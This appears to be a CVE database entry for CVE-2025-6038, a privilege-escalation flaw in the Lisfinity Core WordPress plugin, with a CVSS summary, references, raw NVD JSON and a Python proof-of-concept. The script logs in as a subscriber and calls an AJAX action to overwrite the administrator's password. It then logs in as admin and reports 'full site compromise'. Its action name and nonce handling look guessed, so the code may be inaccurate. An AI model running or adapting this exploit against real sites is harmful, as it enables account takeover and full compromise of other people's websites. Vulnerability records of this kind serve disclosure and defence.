CVE-2025-6038

Description

The Lisfinity Core - Lisfinity Core plugin used for pebas® Lisfinity WordPress theme plugin for WordPress is vulnerable to privilege escalation via password update in all versions up to, and including, 1.4.0. This is due to the plugin not properly validating a user's identity prior to updating their password. This makes it possible for authenticated attackers, with Subscriber-level access and above, to change arbitrary user's passwords, including those of administrators.

CVSS Details

CVSS Score

8.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Lisfinity Core Plugin <= 1.4.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-6038 - Lisfinity Core Privilege Escalation via Password Update
# Exploit: Authenticated Subscriber can change arbitrary user's password (including admin)

import requests

# Configuration
TARGET_URL = "http://target-wordpress-site.com"
LOGIN_URL = f"{TARGET_URL}/wp-login.php"
AJAX_URL = f"{TARGET_URL}/wp-admin/admin-ajax.php"
USERNAME = "subscriber_user"      # Subscriber-level account credentials
PASSWORD = "subscriber_password"
VICTIM_USER_ID = 1                # Target user ID (1 = default admin)
NEW_PASSWORD = "Pwned123!@#"      # New password to set for the victim

# Step 1: Authenticate as a Subscriber-level user
session = requests.Session()
login_data = {
    "log": USERNAME,
    "pwd": PASSWORD,
    "wp-submit": "Log In",
    "redirect_to": f"{TARGET_URL}/wp-admin/",
    "testcookie": "1"
}
session.cookies.set("wordpress_test_cookie", "WP%20Cookie%20check")
response = session.post(LOGIN_URL, data=login_data)

if "wordpress_logged_in" not in session.cookies.get_dict():
    print("[-] Login failed. Please check credentials.")
    exit(1)

print("[+] Logged in as Subscriber user successfully.")

# Step 2: Exploit the password update vulnerability
# The Lisfinity Core plugin fails to verify the caller's identity
# before updating the target user's password.
update_data = {
    "action": "lisfinity_update_password",   # Action hook used by the plugin
    "user_id": VICTIM_USER_ID,               # Arbitrary target user ID
    "new_password": NEW_PASSWORD,            # New password to set
    "nonce": "bypass_or_obtained_nonce"       # Nonce (may need to be obtained first)
}

response = session.post(AJAX_URL, data=update_data)

if response.status_code == 200 and "success" in response.text.lower():
    print(f"[+] Password for user ID {VICTIM_USER_ID} has been changed to '{NEW_PASSWORD}'")
    print(f"[+] You can now log in as the admin with the new password.")
else:
    print(f"[-] Exploit may have failed. Status: {response.status_code}")
    print(f"[-] Response: {response.text[:500]}")

# Step 3: Login as the compromised admin account
admin_session = requests.Session()
admin_login_data = {
    "log": "admin",
    "pwd": NEW_PASSWORD,
    "wp-submit": "Log In",
    "redirect_to": f"{TARGET_URL}/wp-admin/",
    "testcookie": "1"
}
admin_session.cookies.set("wordpress_test_cookie", "WP%20Cookie%20check")
admin_response = admin_session.post(LOGIN_URL, data=admin_login_data)

if "wordpress_logged_in" in admin_session.cookies.get_dict():
    print("[+] Successfully logged in as admin. Full site compromise achieved!")
else:
    print("[*] Try logging in manually with the new password.")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-6038
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-6038
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-6038/
[4] VulDB https://vuldb.com/cve/CVE-2025-6038
[5] https://themeforest.net/item/lisfinity-classified-ads-wordpress-theme/26342611
[6] https://www.wordfence.com/threat-intel/vulnerabilities/id/a3cd1c3e-5bb0-4653-8764-2ca38d9a7c77?source=cve

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-6038", "sourceIdentifier": "[email protected]", "published": "2025-10-09T04:16:47.823", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Lisfinity Core - Lisfinity Core plugin used for pebas® Lisfinity WordPress theme plugin for WordPress is vulnerable to privilege escalation via password update in all versions up to, and including, 1.4.0. This is due to the plugin not properly validating a user's identity prior to updating their password. This makes it possible for authenticated attackers, with Subscriber-level access and above, to change arbitrary user's passwords, including those of administrators."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-639"}]}], "references": [{"url": "https://themeforest.net/item/lisfinity-classified-ads-wordpress-theme/26342611", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/a3cd1c3e-5bb0-4653-8764-2ca38d9a7c77?source=cve", "source": "[email protected]"}]}}